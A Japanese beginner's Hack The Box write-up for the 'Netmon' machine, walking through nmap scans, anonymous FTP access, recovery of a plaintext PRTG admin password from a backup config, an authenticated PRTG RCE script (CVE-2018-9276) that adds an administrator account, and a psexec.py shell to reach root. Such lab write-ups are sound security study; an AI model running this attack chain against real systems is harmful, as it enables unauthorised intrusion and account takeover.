はじめに
筆者は Hack the Box 超絶初心者です。 (今回で machine 攻略 3 つ目)
なので、説明ガバガバな部分もあるかと思いますが、何か訂正などありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は easy です。(easy の中でもかなり easy)
nmap
とりあえず nmap します。
kali@kali:~$ nmap -Pn -A 10.10.10.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 05:56 EST
Nmap scan report for 10.10.10.152
Host is up (0.21s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 59s, deviation: 0s, median: 59s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-22T10:58:13
|_ start_date: 2020-02-22T09:59:48
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.14 secondsftp-anon.nse で詳しく調べる
kali@kali:~$ nmap -Pn --script ftp-anon.nse 10.10.10.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 05:46 EST
Nmap scan report for 10.10.10.152
Host is up (0.20s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 29.73 secondsanonymous login が可能なことがわかります。
ftp コマンドで接続
kali@kali:~$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
02-25-19 10:49PM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19 10:44PM <DIR> Administrator
02-02-19 11:35PM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
02-02-19 11:35PM 33 user.txt
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.29 secs (0.1108 kB/s)user.txt はここで取得できました。
ftp> cd ..
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19 10:44PM <DIR> Administrator
02-02-19 11:35PM <DIR> Public
226 Transfer complete.
ftp> cd Administrator
550 Access is denied.admin には入れません。
80 番 port でブラウザからアクセスしてみる
このようなページが現れます。
PRTG の本体ファイルを探す
How and where does PRTG store its data? この公式ページとにらめっこしながら探していきます。
kali@kali:~$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd /Users/All Users/Paessler/PRTG Network Monitor
550 The system cannot find the file specified.
ftp> cd "Users/All Users/Paessler/PRTG Network Monitor"
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-22-20 07:46AM <DIR> Configuration Auto-Backups
02-22-20 07:00PM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
02-22-20 07:05AM <DIR> Logs (Web Server)
02-22-20 07:03PM <DIR> Monitoring Database
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
02-22-20 10:27PM 1720806 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToDo Database
226 Transfer complete.最終的に見つけたのは
Users/All Users/Paessler/PRTG Network Monitor
です。
config ファイルを落とす
configuration と書いてあるファイルを落とします。
ftp> get "PRTG Configuration.old"
local: PRTG Configuration.old remote: PRTG Configuration.old
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1189697 bytes received in 16.20 secs (71.7122 kB/s)
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1153755 bytes received in 14.99 secs (75.1872 kB/s)
ftp> get "PRTG Configuration.dat"
local: PRTG Configuration.dat remote: PRTG Configuration.dat
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1189697 bytes received in 15.14 secs (76.7473 kB/s)config ファイルの中身を見てみる
以下のすご怪しい記述が PRTG Configuration.old.bak 内で見つかりました。
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>見つかった password でログインしようとしてみる
しかし、弾かれます。 ここで大詰まりしました。 Netmon こちらの writeup を参照します(あーまた今回も自力で root まで解けなかった。。)
If we try to login with those credentials we’ll notice they don’t work, that’s because the file we retrieved them from was a backup, so they’ve probably changed. We just have to replace the year 2018 with 2019, ending up with prtgadmin / PrTg@dmin2019 which should work and allow us to access the dashboard.
僕が先ほど見ていた PRTG Configuration.old.bak は backup のファイルだったようです。
なので本来の password は変更されている可能性があります。
今回は PrTg@dmin2018 を PrTg@dmin2019 に変更することでログインに成功します。
ログインすると以下のような画面が表示されます。
いい感じの exploit を探す
kali@kali:~$ searchsploit PRTG Network Monitor
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution | exploits/windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service) | exploits/windows_x86/dos/44500.py
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result1 つ目を使えたらよかったのですが、version が違いますね。。
色々探していたところ以下の exploit を見つけました。 https://github.com/M4LV0/PRTG-Network-Monitor-RCE
exploit を使う
適当な名前で上記から prtg-exploit.sh をコピペしてきて使用します。
kali@kali:~$ chmod 744 prtg-exploit.sh
kali@kali:~$ ./prtg-exploit.sh -u http://10.10.10.152 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"
[+]#########################################################################[+]
[*] PRTG RCE script by M4LV0 [*]
[+]#########################################################################[+]
[*] https://github.com/M4LV0 [*]
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution CVE-2018-9276 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and add it to the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!shell につなぐ
kali に入っている psexec.py を使用します。
psexec については以下のページが参考になりました。 PsExec を使ってリモートの Windows PC 上のプログラムを実行する
kali@kali:/usr/share/doc/python3-impacket/examples$ python3 psexec.py pentest:'P3nT3st!'@10.10.10.152
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file HLrJbIWj.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service OZxS on 10.10.10.152.....
[*] Starting service OZxS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ls
b"'ls' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n"
C:\Windows\system32>cd ../../User
b'The system cannot find the path specified.\r\n'
C:\Windows\system32>cd ..
C:\Windows>cd ..
C:\>cd Users
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\Users\Administrator\Desktop
02/02/2019 11:35 PM <DIR> .
02/02/2019 11:35 PM <DIR> ..
02/02/2019 11:35 PM 33 root.txt
1 File(s) 33 bytes
2 Dir(s) 12,051,935,232 bytes free
C:\Users\Administrator\Desktop>more root.txtこれで root が取れました!
終わりに
今回は
・password を 2018 から 2019 に変える
・admin のユーザーを作ってから shell にそのユーザーでログインする際に psexec.py を使う
という点が思いつかず、他の writeup を参考にしてしまいました。
easy の Box くらいは自力のみで解ききれるようになりたいです。。
